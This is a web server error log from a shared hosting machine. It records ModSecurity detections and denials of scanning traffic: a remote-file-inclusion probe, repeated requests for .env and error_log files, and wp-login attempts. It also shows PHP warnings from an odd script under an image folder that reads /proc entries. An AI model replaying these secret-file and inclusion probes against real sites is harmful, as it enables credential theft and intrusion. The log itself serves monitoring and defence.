[Tue May 12 07:07:36.131688 2026] [security2:error] [pid 1825287:tid 1825319] [client 34.192.67.98:50460] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://178.128.120.63 found within ARGS:url: https://178.128.120.63/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK1mAgpmE1yW0glLdhLdQAAAM4"]
[Tue May 12 07:07:36.132220 2026] [security2:error] [pid 1825287:tid 1825319] [client 34.192.67.98:50460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK1mAgpmE1yW0glLdhLdQAAAM4"]
[Tue May 12 07:07:36.132495 2026] [security2:error] [pid 1825287:tid 1825319] [client 34.192.67.98:50460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK1mAgpmE1yW0glLdhLdQAAAM4"]
[Tue May 12 07:07:50.115497 2026] [ssl:error] [pid 1820198:tid 1820212] (EAI 2)Name or service not known: [client 66.249.69.96:57678] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:07:50.115543 2026] [ssl:error] [pid 1820198:tid 1820212] AH01941: stapling_renew_response: responder error
[Tue May 12 07:07:53.831400 2026] [authz_core:error] [pid 1825179:tid 1825220] [client 34.225.87.80:55174] AH01630: client denied by server configuration: /home/piregwan/public_html/maintenance/error_log
[Tue May 12 07:08:01.748494 2026] [:error] [pid 1844863:tid 1844878] [client 154.9.227.231:43323] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 07:08:58.113486 2026] [security2:error] [pid 1808852:tid 1808859] [client 43.131.243.61:52250] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/gaston/"] [unique_id "agK16hfeipD4uoG21FpP3QAAAAQ"]
[Tue May 12 07:08:58.419993 2026] [authz_core:error] [pid 1808852:tid 1808876] [client 20.56.20.8:58676] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log, referer: binance.com
[Tue May 12 07:09:03.033195 2026] [security2:error] [pid 1825179:tid 1825209] [client 43.157.82.252:46840] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-saint-patrick-des-brasseurs-alpins/"] [unique_id "agK179r1yOh9Tvizezi9gQAAAEs"]
[Tue May 12 07:09:07.287783 2026] [authz_core:error] [pid 1808852:tid 1808861] [client 20.56.20.8:59361] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log, referer: binance.com
[Tue May 12 07:09:15.539286 2026] [authz_core:error] [pid 1820198:tid 1820222] [client 20.56.20.8:59893] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log, referer: binance.com
[Tue May 12 07:09:25.014100 2026] [authz_core:error] [pid 1844863:tid 1844875] [client 20.56.20.8:60648] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log, referer: binance.com
[Tue May 12 07:09:27.480295 2026] [security2:error] [pid 1825287:tid 1825308] [client 43.134.177.47:38662] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK2BwgpmE1yW0glLdhL6AAAAMM"]
[Tue May 12 07:09:49.799412 2026] [authz_core:error] [pid 1844863:tid 1844876] [client 194.163.140.214:59844] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log, referer: binance.com
[Tue May 12 07:10:19.408055 2026] [authz_core:error] [pid 1825287:tid 1825317] [client 194.163.140.214:50660] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log, referer: binance.com
[Tue May 12 07:10:21.342008 2026] [:error] [pid 1820198:tid 1820211] [client 149.62.41.5:43285] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Tue May 12 07:10:22.817381 2026] [:error] [pid 1844863:tid 1844872] [client 149.62.41.5:37990] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Tue May 12 07:10:25.128096 2026] [security2:error] [pid 1808852:tid 1808857] [client 43.159.152.4:40536] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/mphb_room_type_facility/62"] [unique_id "agK2QRfeipD4uoG21FpQOAAAAAI"]
[Tue May 12 07:10:33.713472 2026] [security2:error] [pid 1825287:tid 1825310] [client 208.84.100.229:33990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.groupe-habilis.fr"] [uri "/.env"] [unique_id "agK2SQgpmE1yW0glLdhMVgAAAMU"]
[Tue May 12 07:10:33.713692 2026] [security2:error] [pid 1825287:tid 1825310] [client 208.84.100.229:33990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.groupe-habilis.fr"] [uri "/.env"] [unique_id "agK2SQgpmE1yW0glLdhMVgAAAMU"]
[Tue May 12 07:10:33.713941 2026] [security2:error] [pid 1825287:tid 1825310] [client 208.84.100.229:33990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agK2SQgpmE1yW0glLdhMVgAAAMU"]
[Tue May 12 07:10:33.809403 2026] [security2:error] [pid 1808852:tid 1808873] [client 208.84.100.229:34032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.groupe-habilis.fr"] [uri "/api/.env"] [unique_id "agK2SRfeipD4uoG21FpQTwAAABI"]
[Tue May 12 07:10:33.809693 2026] [security2:error] [pid 1808852:tid 1808873] [client 208.84.100.229:34032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.groupe-habilis.fr"] [uri "/api/.env"] [unique_id "agK2SRfeipD4uoG21FpQTwAAABI"]
[Tue May 12 07:10:33.809963 2026] [security2:error] [pid 1808852:tid 1808873] [client 208.84.100.229:34032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agK2SRfeipD4uoG21FpQTwAAABI"]
[Tue May 12 07:10:33.810406 2026] [security2:error] [pid 1844863:tid 1844877] [client 208.84.100.229:34036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.groupe-habilis.fr"] [uri "/backend/.env"] [unique_id "agK2SfaAnTZtx1_H_wzYQQAAAUg"]
[Tue May 12 07:10:33.810615 2026] [security2:error] [pid 1844863:tid 1844877] [client 208.84.100.229:34036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.groupe-habilis.fr"] [uri "/backend/.env"] [unique_id "agK2SfaAnTZtx1_H_wzYQQAAAUg"]
[Tue May 12 07:10:33.810856 2026] [security2:error] [pid 1844863:tid 1844877] [client 208.84.100.229:34036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agK2SfaAnTZtx1_H_wzYQQAAAUg"]
[Tue May 12 07:10:33.823834 2026] [security2:error] [pid 1842385:tid 1842393] [client 208.84.100.229:34022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.groupe-habilis.fr"] [uri "/app/.env"] [unique_id "agK2SRs7kySIUZ3ORnJFLgAAAQM"]
[Tue May 12 07:10:33.824068 2026] [security2:error] [pid 1842385:tid 1842393] [client 208.84.100.229:34022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.groupe-habilis.fr"] [uri "/app/.env"] [unique_id "agK2SRs7kySIUZ3ORnJFLgAAAQM"]
[Tue May 12 07:10:33.824299 2026] [security2:error] [pid 1842385:tid 1842393] [client 208.84.100.229:34022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agK2SRs7kySIUZ3ORnJFLgAAAQM"]
[Tue May 12 07:10:33.830328 2026] [security2:error] [pid 1844863:tid 1844892] [client 208.84.100.229:33994] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.groupe-habilis.fr"] [uri "/.env.local"] [unique_id "agK2SfaAnTZtx1_H_wzYQgAAAVc"]
[Tue May 12 07:10:33.830451 2026] [security2:error] [pid 1825179:tid 1825222] [client 208.84.100.229:34008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.groupe-habilis.fr"] [uri "/.env.production"] [unique_id "agK2Sdr1yOh9Tvizezi-UwAAAFg"]
[Tue May 12 07:10:33.830493 2026] [security2:error] [pid 1844863:tid 1844892] [client 208.84.100.229:33994] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.groupe-habilis.fr"] [uri "/.env.local"] [unique_id "agK2SfaAnTZtx1_H_wzYQgAAAVc"]
[Tue May 12 07:10:33.830606 2026] [security2:error] [pid 1825179:tid 1825222] [client 208.84.100.229:34008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.groupe-habilis.fr"] [uri "/.env.production"] [unique_id "agK2Sdr1yOh9Tvizezi-UwAAAFg"]
[Tue May 12 07:10:33.830708 2026] [security2:error] [pid 1844863:tid 1844892] [client 208.84.100.229:33994] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agK2SfaAnTZtx1_H_wzYQgAAAVc"]
[Tue May 12 07:10:33.830810 2026] [security2:error] [pid 1825179:tid 1825222] [client 208.84.100.229:34008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agK2Sdr1yOh9Tvizezi-UwAAAFg"]
PHP Warning:  filesize(): stat failed for /proc/1704525/task/1704525/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704525/task/1704525/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704525/task/1704525/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704525/task/1704525/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704525/task/1704525/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704525/task/1704525/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 07:11:33.286656 2026] [ssl:error] [pid 1842385:tid 1842393] [client 13.219.121.241:41227] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname cpanel.of-crystal-lake.net provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 07:11:56.702653 2026] [authz_core:error] [pid 1825179:tid 1825204] [client 129.146.16.50:61902] AH01630: client denied by server configuration: /home/jeanboya/public_html/wp-includes/error_log
[Tue May 12 07:11:57.357203 2026] [authz_core:error] [pid 1825179:tid 1825204] [client 129.146.16.50:61902] AH01630: client denied by server configuration: /home/jeanboya/public_html/wp-includes/error_log
[Tue May 12 07:12:31.482143 2026] [authz_core:error] [pid 1825179:tid 1825213] [client 20.56.20.8:57707] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Tue May 12 07:12:39.590800 2026] [authz_core:error] [pid 1820198:tid 1820206] [client 20.56.20.8:58206] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Tue May 12 07:12:51.516195 2026] [security2:error] [pid 1844863:tid 1844878] [client 43.138.68.113:44926] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agK20_aAnTZtx1_H_wzZrgAAAUk"]
[Tue May 12 07:12:52.311230 2026] [authz_core:error] [pid 1820198:tid 1820204] [client 20.56.20.8:59052] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/widgets/error_log, referer: binance.com
[Tue May 12 07:12:57.219527 2026] [security2:error] [pid 1844863:tid 1844880] [client 43.153.36.110:54250] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "naturedetres.fr"] [uri "/"] [unique_id "agK22faAnTZtx1_H_wzZtAAAAUs"]
[Tue May 12 07:12:59.962587 2026] [authz_core:error] [pid 1820198:tid 1820213] [client 20.56.20.8:59634] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/widgets/error_log, referer: binance.com
[Tue May 12 07:13:12.104822 2026] [security2:error] [pid 1844863:tid 1844893] [client 1.12.70.96:56086] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agK26PaAnTZtx1_H_wzZwwAAAVg"], referer: http://tchatbooster.fr
[Tue May 12 07:13:35.116042 2026] [ssl:error] [pid 1825179:tid 1825211] (EAI 2)Name or service not known: [client 66.249.69.96:41187] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:13:35.116092 2026] [ssl:error] [pid 1825179:tid 1825211] AH01941: stapling_renew_response: responder error
[Tue May 12 07:13:39.526613 2026] [security2:error] [pid 1820198:tid 1820220] [client 101.32.15.141:56744] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agK3A81tk6y7yBJLpJpXJgAAAJQ"]
[Tue May 12 07:13:40.986304 2026] [security2:error] [pid 1825179:tid 1825202] [client 43.153.87.54:45282] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/"] [unique_id "agK3BNr1yOh9Tvizezi_kwAAAEQ"], referer: http://www.manhattan-studio.fr
[Tue May 12 07:14:22.746655 2026] [proxy_http:error] [pid 1842385:tid 1842400] (20014)Internal error (specific information not available): [client 5.255.97.37:56868] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:22.919853 2026] [proxy_http:error] [pid 1820198:tid 1820212] (20014)Internal error (specific information not available): [client 5.255.97.37:52314] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:22.919881 2026] [proxy:error] [pid 1820198:tid 1820212] [client 5.255.97.37:52314] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.example
[Tue May 12 07:14:22.920111 2026] [proxy_http:error] [pid 1844863:tid 1844884] (20014)Internal error (specific information not available): [client 5.255.97.37:56932] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:22.922269 2026] [proxy_http:error] [pid 1842385:tid 1842405] (20014)Internal error (specific information not available): [client 5.255.97.37:52422] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:22.922288 2026] [proxy:error] [pid 1842385:tid 1842405] [client 5.255.97.37:52422] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/public/.env
